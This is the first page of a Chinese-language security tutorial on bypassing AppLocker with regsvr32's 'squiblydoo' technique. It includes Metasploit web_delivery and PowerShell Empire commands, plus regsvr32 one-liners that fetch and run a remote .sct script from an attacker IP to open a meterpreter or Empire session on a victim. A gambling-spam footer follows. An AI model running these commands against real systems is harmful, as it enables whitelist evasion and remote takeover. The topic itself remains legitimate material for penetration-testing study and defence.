歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

通過regsrv32.exe繞過Applocker應用程序白名單的多種方法

來源:本站整理 作者:佚名 時間:2019-04-30 TAG: 我要投稿

在大型組織的安全領域中,AppLocker正在扮演越來越重要的角色。應用AppLocker規則可以顯著降低企業的安全風險,AppLocker規則可以應用于目標應用,這些規則也是構成AppLocker策略的基本組件。
AppLocker規則介紹
規則集合(Rule Collection)
AppLocker控制臺以規則集合作為組織單元,這些集合包括可執行文件、腳本、Windows安裝文件、封裝的應用和應用安裝包以及DLL文件。這些規則可以讓我們輕松區分開不同類型的應用。
規則條件(Rule Condition)
規則條件可以幫助AppLocker識別哪些應用對應哪些規則。三個主要的規則條件分別為應用發布者、路徑以及文件哈希。
文件路徑條件
以應用在系統中的路徑作為識別依據;
文件發布者條件
以應用的屬性或者數字簽名作為識別依據;
文件哈希條件
以應用的哈希值作為識別依據;
看似這些強大的規則讓黑客攻擊無處遁形,但不幸的是,對于防御者來說,除了默認規則以外,AppLocker還涉及到許多自定義配置,而黑客正是利用這些配置作為突破口的。本文將介紹通過 regsrv32.exe繞過Applocker應用程序白名單的多種方法。
Regsvr32介紹
Regsvr32全稱是Microsoft Register Server。它是windows的命令行實用工具。雖然regsvr32有時會引起一些莫名其妙的問題,但作為Windows系統文件,它仍是一個重要的文件。該文件位于C:\Windows的子文件夾中,該文件能夠觀察、跟蹤和影響其他程序。由于它是.exe格式,所以主要被用于在Windows文件擴展名中注冊和注銷程序,它的進程可以廣泛地協助OLE(對象鏈接和嵌入),DLL(數據鏈接庫)和OCX(ActiveX控件模塊)。上述流程在后臺工作,可以通過任務管理器查看。終止,它是微軟最受信任的文件之一。
regsvr32工作原理
當你在regsvr32中注冊DLL文件時,與regsvr32關聯的程序的信息將添加到Windows中。然后訪問這些信息,以了解程序數據的位置以及如何與程序數據進行交互。在注冊DLL文件時,信息會被添加到目錄的中央,以便windows可以使用它。這些文件的整個路徑都有可執行代碼,由于這些文件,windows可以調用特定的函數。這些文件非常方便,當軟件更新時,這些文件會自動調用更新后的版本。簡而言之,它有助于避免軟件的版本問題。通常,除了注冊和注銷DLL文件外,通常不使用此文件。
RegSvr32.exe具有以下命令行選項:
語法:Regsvr32 [/s][/u] [/n] [/i[:cmdline]]
· /u:注銷服務器;
· /i:調用DllInstall傳遞一個可選的[cmdline],當它與/u一起使用時,它會調用dll uninstall。
· /n:不要調用DllRegisterServer,此選項必須與/i一起使用
· / s :沉默,不顯示消息框;
要了解更多信息,請訪問這里。
Web傳遞(Web Delivery)
此模塊會快速啟動一個提供有效載荷的web服務器,所提供的命令將允許下載和執行有效載荷。它將通過指定的腳本語言解釋器或通過regsvr32.exe的“squiblydoo”來繞過應用程序白名單。該模塊的主要目的是當攻擊者不得不手動輸入命令時,在目標設備上快速建立會話,例如命令注入。
Regsvr32使用“squiblydoo”技術來繞過應用程序白名單,簽名的Microsoft二進制文件Regsvr32能夠請求.sct文件,然后在其中執行包含的PowerShell命令。兩個web請求(即, .sct文件和PowerShell下載或執行)都可以發生在同一個端口上。PSH(Binary)”會將文件寫入磁盤,允許自定義二進制文件被下載或執行。
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
一旦使用這些文本開始運行漏洞,你將擁有一個為自定義的URL,就可以在受害者電腦的命令提示符中運行該URL。
regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
在命令執行后按回車鍵,就將進行會話。輸入“sysinfo”以獲取目標電腦的信息。
PowerShell Empire
Empire是一款類似Metasploit的滲透測試框架,基于python編寫,Empire是一個純粹的PowerShell后開發代理,建立在密碼安全通信和靈活的架構上。Empire實現了無需powershell.exe即可運行PowerShell代理的功能,從鍵盤記錄器到Mimikatz等快速部署的后期開發模塊,以及適應性通信以避開網絡檢測,所有這些都包含在以可用性為重點的框架中。
在PowerShell Empire方法中,我們必須將.sct tacks與Metasploit配對,但是在這種方法中,我們將使用Empire框架。它完全基于python的PowerShell windows代理,這使得它非常有用。
如下所示,啟動Empire框架后,輸入listener命令,以檢查是否存在反偵查進程。
uselistner http
set Host //192.168.1.109
execute
使用上述命令,你將擁有一個反偵查進程。輸入back命令,就可以退出反偵查進程,以便啟動PowerShell。
一旦你退出listener命令,就需要使用一個漏洞來創建惡意文件。在Empire中,stage代表一段代碼,它允許我們的惡意代碼通過受感染的主機上的代理運行。這意味著要創建一個漏洞,我們將不得不通過usestager。命令如下:
usestager windows/launcher_sct
set listener http
execute
執行命令后,usestager將在/ tmp中創建一個launcher.sct。現在要獲得會話,就必須通過輸入以下內容來啟動python服務器:
python -m SimpleHTTPServer 8080
當服務器啟動時,剩下的唯一步驟就是在受害者的電腦中執行我們的惡意軟件。此時,就要在命令提示符中輸入以下命令:
regsvr / s / n / u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
在上面的命令中,我們使用了端口8080,這是因為我們的python服務器在同一個端口上被激活。
執行上述操作后,你將收到一個會話:

[1] [2] [3]  下一頁

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺 南昌麻将算子规则图片 66江苏麻将作弊软件下载 31选7中奖查询 北京赛车pk10开奖直 广东十一选五助手 时时彩做号方法 1378棋牌游戏网址 网络上怎么赚钱是真的吗 足彩胜负彩比分直播 哪一种游戏最赚钱的软件是什么软件 六合彩综合资料 排列三牛彩图谜总汇 秒速飞艇开奖网站 河南快赢481走势图下载 浙江体彩20选5基本 赚钱de棋牌游戏